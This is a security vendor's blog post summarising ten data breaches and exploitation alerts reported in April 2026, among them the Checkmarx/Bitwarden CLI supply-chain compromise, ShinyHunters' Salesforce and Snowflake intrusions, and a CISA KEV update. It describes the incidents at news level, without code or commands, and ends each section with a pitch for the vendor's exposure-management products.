Strobesstrobes
Back to Blog
April 2026 Top Data Breaches summary infographic - Checkmarx, Bitwarden, Anodot, McGraw-Hill, ADT, Citizens Bank, Adobe, Medtronic, Vercel, CISA, France Titres
Data BreachesCybersecurityCTEMASM

Top 10 Data Breaches of April 2026

Shubham JhaMay 1, 202615 min read

Table of Contents

Authors

S
Shubham Jha

Share

What if the biggest security risk in your organization right now is your own security tools? In April 2026, that stopped being a thought experiment. Attackers trojanized the vulnerability scanners running inside enterprise CI/CD pipelines, compromised the password manager trusted by over 50,000 businesses, and pivoted through a cloud analytics platform into a dozen corporate Snowflake environments at once. Across the ten biggest data breaches of April 2026, more than 50 million records were exposed or stolen. Most of it happened in environments that already had security tools deployed. Here is the uncomfortable pattern connecting all of it, and what your security program needs to do differently.

April 2026 Top Data Breaches summary infographic
April 2026 Top Data Breaches at a glance

1. Checkmarx + Bitwarden CLI: When Your Security Scanner Becomes the Weapon

Date: April 22, 2026  ·  Type: CI/CD supply chain poisoning  ·  Actor: TeamPCP / Shai-Hulud

This is the breach that should keep every AppSec and DevSecOps team awake, and it represents the most dangerous class of supply chain attacks in 2026. Attackers trojanized Checkmarx KICS, an infrastructure-as-code security scanner embedded in CI/CD pipelines across thousands of organizations, pushing malicious images to DockerHub, VS Code extensions, and GitHub Actions simultaneously. Hours later, the Bitwarden CLI npm package (@bitwarden/cli@2026.4.0) was also poisoned for approximately 90 minutes, targeting GitHub personal access tokens, npm tokens, SSH keys, AWS/Azure/GCP credentials, and even AI tool configurations for Claude, Cursor, and Aider.

The stolen data was encrypted with AES-256-GCM and exfiltrated to a domain impersonating Checkmarx (audit.checkmarx[.]cx). If GitHub tokens were found, the malware weaponized them to inject malicious Actions workflows into victim repositories, cascading the attack downstream. The payload also achieved shell persistence via ~/.bashrc and ~/.zshrc modifications.

This attack followed TeamPCP's earlier March 2026 compromise of Aqua Security's Trivy vulnerability scanner, the initial foothold that gave attackers CI/CD secrets to pivot into Checkmarx, LiteLLM, and Telnyx. The Vect ransomware group partnered with TeamPCP and listed its first public victim on April 15, a property management firm with 700 GB stolen.

Attackers are deliberately targeting the tools developers trust most: security scanners, password managers, and high-privilege software embedded in build pipelines. These tools are over-permissioned by design and rarely monitored for anomalous behavior. Strobes' ASPM continuously maps CI/CD-integrated tools as first-class attack surface assets, flagging over-privileged pipeline dependencies before they become exfiltration vectors.

Scale: 50K+ businesses at risk  ·  4 security/dev tools compromised  ·  CI/CD secrets stolen at scale
Sources: The Hacker News · Sophos · The Register · SecurityWeek · Socket.dev · Bitwarden Community

2. Anodot + Rockstar Games: Third-Party Cloud Access Abuse

Date: April 4-11, 2026  ·  Type: Third-party cloud access abuse  ·  Actor: ShinyHunters

On April 4, Anodot, an AI-powered cloud analytics and anomaly detection platform, reported service outages affecting its connectors for Snowflake, Amazon S3, and Amazon Kinesis. What wasn't disclosed at the time was that the outages coincided with the theft of authentication tokens Anodot held for its customers' cloud environments.

ShinyHunters used those tokens to gain what appeared to be legitimate access to Rockstar Games' Snowflake data warehouse, executing standard database query operations that blended with normal analytical workloads to evade detection. By April 11, ShinyHunters posted a ransom ultimatum for Rockstar: "Pay or leak by April 14." Rockstar confirmed the breach and described the stolen data as "limited, non-material company information." At least a dozen other Anodot customers faced the same exposure, none of whom had visibility into the inherited risk.

This mirrors ShinyHunters' devastating 2024 Snowflake campaign that hit Ticketmaster (560 million records), AT&T (110 million records), and Santander Bank (30 million customers) through the same pattern. Supply chain attacks that exploit trusted third-party access are the defining threat of 2026, and they are only getting harder to detect.

Anodot had authenticated, legitimate access to hundreds of Snowflake environments, and every one of those organizations had a blind spot they did not know about. This is one of the defining patterns in the biggest supply chain attacks of 2026: a trusted third party holds the keys, and the downstream victim never sees the breach coming. Third-party platforms that hold OAuth tokens or cloud credentials to your environment are an extension of your attack surface. Strobes' Attack Surface Management continuously discovers and monitors these inherited access paths.

Scale: 12+ downstream companies compromised  ·  Standard cloud queries used to evade detection
Sources: TechCrunch · BleepingComputer · The Register

3. McGraw-Hill: 13.5M Records from a Misconfigured Salesforce Endpoint (DIVD-2026-00005)

Date: April 14, 2026  ·  Type: SaaS misconfiguration  ·  Actor: ShinyHunters

The McGraw-Hill Salesforce data breach is one of the clearest examples of what happens when SaaS configuration management is treated as a one-time task rather than a continuous process. After a ransom deadline expired, ShinyHunters dumped over 100 GB of data publicly. The root cause: a Salesforce Experience Cloud misconfiguration where guest user profiles had been granted excessive permissions, leaving the /s/sfsites/aura endpoint unauthenticated and queryable. No exploit. No zero-day. Just a misconfigured SaaS environment that automated scanners can and should catch.

The Dutch Institute for Vulnerability Disclosure issued advisory DIVD-2026-00005 in April, confirming this is not a McGraw-Hill-specific issue. It is a systemic Salesforce Experience Cloud misconfiguration affecting any organization that hasn't properly locked down guest user permissions and Aura component access. DIVD is conducting large-scale scanning to notify affected organizations.

Have I Been Pwned confirmed 13.5 million unique email addresses in the leaked data, alongside names, phone numbers, and physical addresses, a significant spear-phishing risk for McGraw-Hill's global student and educator base.

This is one of the most instructive Salesforce data breaches of April 2026: it required no exploit and no zero-day. ShinyHunters used mass-scanning scripts to find exposed Aura endpoints, the same technique any attack surface management tool runs continuously. Strobes' ASPM surfaces publicly accessible SaaS resources with excessive guest permissions before attackers scan for them first.

Scale: 13.5M accounts confirmed (HIBP)  ·  100+ GB dumped  ·  Industry-wide issue (DIVD-2026-00005)
Sources: BleepingComputer · The Register · The Record (Recorded Future) · DIVD CSIRT · Have I Been Pwned · Security Magazine

4. ADT: Vishing Compromises Okta SSO, Opens Salesforce to Mass Exfiltration

Date: April 20, 2026  ·  Type: Identity-based attack (vishing + SSO compromise)  ·  Actor: ShinyHunters

The ADT Salesforce data breach started not with a vulnerability but with a phone call. ShinyHunters used voice phishing (vishing) to compromise a single employee's Okta SSO account and gain access to ADT's Salesforce environment. No exploit. No vulnerability. One impersonated IT support call, one compromised identity, full Salesforce access. ADT detected the intrusion on April 20, terminated access, and launched an investigation, but ShinyHunters had already exfiltrated the data and dumped an 11 GB archive publicly after ADT refused to pay the ransom.

Have I Been Pwned analyzed the leak and confirmed 5.5 million affected individuals: names, phone numbers, addresses, and in some cases dates of birth and partial Social Security numbers. This is ADT's third data breach in two years, prior incidents occurred in August and October 2024. ShinyHunters' 2026 campaign runs almost entirely on vishing attacks targeting Okta, Microsoft Entra, and Google SSO accounts to gain SaaS footholds across enterprises and BPO providers.

A single SSO account without anomalous access detection opened an entire Salesforce environment. In the ransomware attacks of April 2026, identity is consistently the entry point, not a vulnerability in the traditional sense. Strobes' security program validates whether access paths to critical SaaS environments are properly gated and flags over-permissioned identities before attackers weaponize them.

Scale: 5.5M confirmed (HIBP)  ·  10M+ claimed  ·  11 GB archive leaked
Sources: BleepingComputer · Have I Been Pwned · The Register · CybersecurityNews · Tom's Guide

5. Citizens Bank + Frost Bank: One Vendor, Two $50B+ Banks Breached Simultaneously

Date: April 20, 2026  ·  Type: Third-party vendor compromise + ransomware double-extortion  ·  Actor: Everest RaaS

The Everest ransomware-as-a-service operation posted both Citizens Financial Group ($227.9 billion in assets, 1,000+ branches across 14 states) and Frost Bank ($53 billion in assets, 200+ Texas locations) on its dark web extortion site on the same day, April 20, with a six-day payment deadline. ZeroFox's analysis, shared with American Banker, confirmed the two breaches shared a single point of failure: one compromised third-party vendor, evidenced by matching document-production metadata across both banks' leaked data samples.

Everest claimed 3.4 million records from Citizens and over 250,000 Social Security numbers and TINs from Frost. Both banks confirmed the breach originated from a vendor, not from direct unauthorized access to their own networks. Multiple federal class-action lawsuits were filed in Rhode Island courts within days of disclosure.

One vendor, two of America's largest banks exposed simultaneously. Shared vendors create shared, invisible risk, and it is one of the most underestimated exposure patterns in financial services. Strobes' ASM maps vendor exposure paths and flags unmonitored third-party ingress points before ransomware groups like Everest find the same shared access first.

Scale: 3.4M + 250K SSNs claimed  ·  380+ GB total  ·  Federal class-action lawsuits filed
Sources: American Banker · Cybernews · PYMNTS · Morningstar/PR Newswire · SC Media

6. Adobe (Alleged): BPO Supply Chain Exposes 13M Support Tickets and Bug Bounty Data

Date: Early April 2026  ·  Type: Third-party BPO compromise + ticketing misconfiguration  ·  Actor: "Mr. Raccoon" (unconfirmed by Adobe)

Threat actor "Mr. Raccoon" claimed a breach of Adobe via an Indian BPO firm contracted for customer support. The attack chain: phishing email, RAT deployed on BPO employee's machine, spear-phish escalated to the employee's manager, expanded access to Adobe's support ticketing environment. The most alarming detail was an architectural failure: the ticketing platform apparently allowed any agent to export all tickets in a single bulk request with no rate limits, no volume alerts, and no approval workflow required.

The alleged stolen cache includes 13 million customer support tickets, 15,000 employee records, and, critically, all of Adobe's HackerOne bug bounty submissions. If the HackerOne data is real, it contains step-by-step vulnerability disclosures for issues that may remain unpatched, handing attackers a ready-made exploitation roadmap. Adobe has not confirmed or denied the incident. Vx-underground researchers described the claimed compromise as appearing "legitimate."

Two failures drove this breach: unchecked BPO vendor access and an application-level misconfiguration that permitted unlimited bulk data export without triggering any controls. Strobes' ASPM surfaces over-permissioned application configurations, including third-party support systems, that allow mass exfiltration without generating a single alert.

Scale: 13M support tickets alleged  ·  15K employee records  ·  HackerOne bug submissions at risk
Sources: Cybernews · SC Media · CybersecurityNews · CyberPress

7. Medtronic: ShinyHunters Claims 9M+ Records from the World's Largest Medical Device Maker

Date: Late April 2026  ·  Type: Corporate IT network breach  ·  Actor: ShinyHunters

Medtronic, the world's largest medical device manufacturer, confirmed unauthorized access to its corporate IT systems in an SEC Form 8-K filing, stating no products, manufacturing operations, or patient safety were affected. ShinyHunters claimed theft of over 9 million records and listed the company on its dark web extortion site before the company was subsequently removed. Medtronic engaged external cybersecurity experts and notified federal law enforcement.

This came weeks after Iran-linked hacktivist group Handala's March 2026 wiper attack on rival Stryker, where employees reportedly watched their systems being wiped in real time. Healthcare device infrastructure has emerged as a clear and sustained 2026 threat theme, with geopolitical and financially motivated actors both targeting the sector in the same quarter.

A confirmed SEC-disclosed breach with 9M+ records claimed is a failure of both attack surface visibility and regulatory readiness. In regulated environments, this is why continuous monitoring across the full attack surface matters more than point-in-time assessments. An annual pentest would not have caught the access path that led to this breach.

Scale: 9M+ records claimed  ·  SEC Form 8-K filed  ·  No operational or patient impact confirmed
Sources: BleepingComputer · TechRadar · Security Affairs · MedTech Dive · HIPAA Journal

8. Vercel: One "Allow All" OAuth Grant Enables Full Internal Access via Compromised AI Tool

Date: Mid-April 2026  ·  Type: Over-permissioned AI integration  ·  Actor: Unknown

Vercel confirmed a security incident after threat actors claimed to have breached its internal systems via a compromised AI tool, Context.ai, that a single employee had connected with "Allow All" OAuth permissions. Using the compromised tool as an entry point, attackers accessed internal systems and claimed to be selling the stolen data for $2 million.

This breach represents an entirely new attack surface class: enterprise AI tool integrations. As organizations rush to connect AI coding assistants, analytics tools, and workflow automation to their cloud environments, each OAuth connection with excessive permissions creates an unmonitored entry point. "Allow All" is the new misconfigured S3 bucket, and most organizations have no inventory of which AI tools their employees have connected, at what permission level, or to which systems.

AI tool integrations are shadow IT at machine speed. The Vercel breach is a direct consequence of unmanaged OAuth grant sprawl, one of the fastest-growing exposure classes in 2026. If your security program does not maintain a live inventory of which AI and SaaS tools hold elevated access to your cloud environments, you have a blind spot that attackers are actively scanning for. Strobes' Attack Surface Management continuously discovers and assesses these integrations.

Scale: Stolen data listed for $2M  ·  Single OAuth grant opened full internal access
Sources: Privacy Guides · TechRadar · BleepingComputer

9. CISA KEV Alert: Ransomware Gangs Actively Exploiting 4 Microsoft CVEs, Including One from 2012

Date: April 13, 2026  ·  Type: Known exploited vulnerabilities  ·  Relevance: RBVM / patching urgency

Among the data breaches and vulnerability disclosures of April 2026, this CISA alert stands out. Four Microsoft CVEs were added to the Known Exploited Vulnerabilities catalog with an April 27 federal patching deadline, all confirmed as active ransomware attack vectors:

  • CVE-2025-60710: Windows link-following vulnerability, privilege escalation (patched December 2025)
  • CVE-2023-36424: Windows Common Log File System Driver, privilege escalation (patched November 2023)
  • CVE-2023-21529: Microsoft Exchange Server deserialization flaw, RCE for authenticated attackers; confirmed ransomware use (patched February 2023)
  • A fourth CVE patched over 14 years ago is still being actively exploited in the wild in 2026

CISA also added two Adobe Acrobat CVEs to the same KEV update. The Exchange Server RCE represents the clearest danger for enterprises still running unpatched on-premise deployments: an authenticated attacker, a compromised service account or phished employee, can achieve full remote code execution.

Four CVEs actively weaponized in ransomware attacks. One patched over a decade ago. Without live threat intelligence tied to your actual asset inventory, security teams have no way to know which of their thousands of unpatched CVEs are being exploited in active ransomware campaigns right now. Strobes' RBVM integrates CISA KEV data and real-world exploitation signals to surface which vulnerabilities in your environment demand immediate action, rather than CVSS scores that have not changed in years.

Scale: 4 Microsoft + 2 Adobe CVEs added to KEV  ·  April 27 federal patching deadline
Sources: The Register · CISA KEV catalog

10. France Titres (ANTS): 19M National Identity Records Allegedly Stolen from a French Government Agency

Date: April 15, 2026  ·  Type: Unauthorized access to government identity infrastructure  ·  Actor: "breach3d"

France Titres, the government agency managing all French identity and registration documents, including national ID cards, driver's licenses, and passports, disclosed a breach detected on April 15. Threat actor "breach3d" claimed up to 19 million records stolen, including login IDs, full names, email addresses, dates of birth, account identifiers, and in some cases, postal addresses, places of birth, and phone numbers. France's data protection authority CNIL, the Paris Public Prosecutor, and national cybersecurity agency ANSSI are all involved in the investigation.

The agency confirmed the exposed data does not grant direct portal access, but the combination of national ID-linked personal data creates substantial social engineering and identity fraud risk at a scale affecting a significant portion of the French population.

For organizations operating under NIS2, GDPR, or DORA, this incident illustrates both the breach notification obligations and the regulatory exposure that follow an attack on identity infrastructure. The France Titres breach is a reminder that data breaches in 2026 increasingly target government and public-sector systems, where the compliance consequences compound the operational damage. Continuous monitoring of these environments is no longer a best practice under NIS2. It is a requirement.

Scale: Up to 19M records claimed  ·  National ID, driver's license, passport-linked data  ·  CNIL + ANSSI investigating
Sources: SC Media · Privacy Guides · SharkStriker

What April 2026 Is Really Telling Security Teams

Look across all ten data breaches of April 2026, and one pattern becomes impossible to ignore: attackers are no longer breaking in. They are walking in through tools you trust, vendors you rely on, and identity providers you assume are protected.

The security toolchain is now the primary target. Checkmarx KICS, Bitwarden CLI, Trivy, and LiteLLM were all compromised in a single coordinated campaign. Anodot's analytics connectors handed attackers authenticated access to a dozen cloud environments at once. When the scanner that finds your vulnerabilities becomes the vulnerability, you have an exposure that your security program was not designed to see.

Identity is the new perimeter, and vishing is winning. ADT's entire Salesforce instance was opened by one compromised Okta SSO account via a phone call. No exploit. No malware. ShinyHunters' entire 2026 campaign runs on this pattern. If your security program is not monitoring for SSO sessions bulk-exporting CRM data, you have an exposure that attackers are already using.

SaaS misconfiguration is silent, scalable, and systemic. The Salesforce misconfiguration behind the McGraw-Hill breach affects every org with improperly configured guest user permissions. DIVD confirmed it is industry-wide. Annual audits do not catch what continuous exposure management would have flagged on day one.

The breaches of April 2026 did not happen because organizations lacked security tools. They happened because those tools could not see the exposures that mattered most, and by the time anyone looked, the damage was done.

For context on what the threat landscape looked like the month before, see the worst data breaches of March 2026. For the full 2025 monthly breach history that sets the backdrop for these attacks, the 2025 data breach roundup is worth reviewing.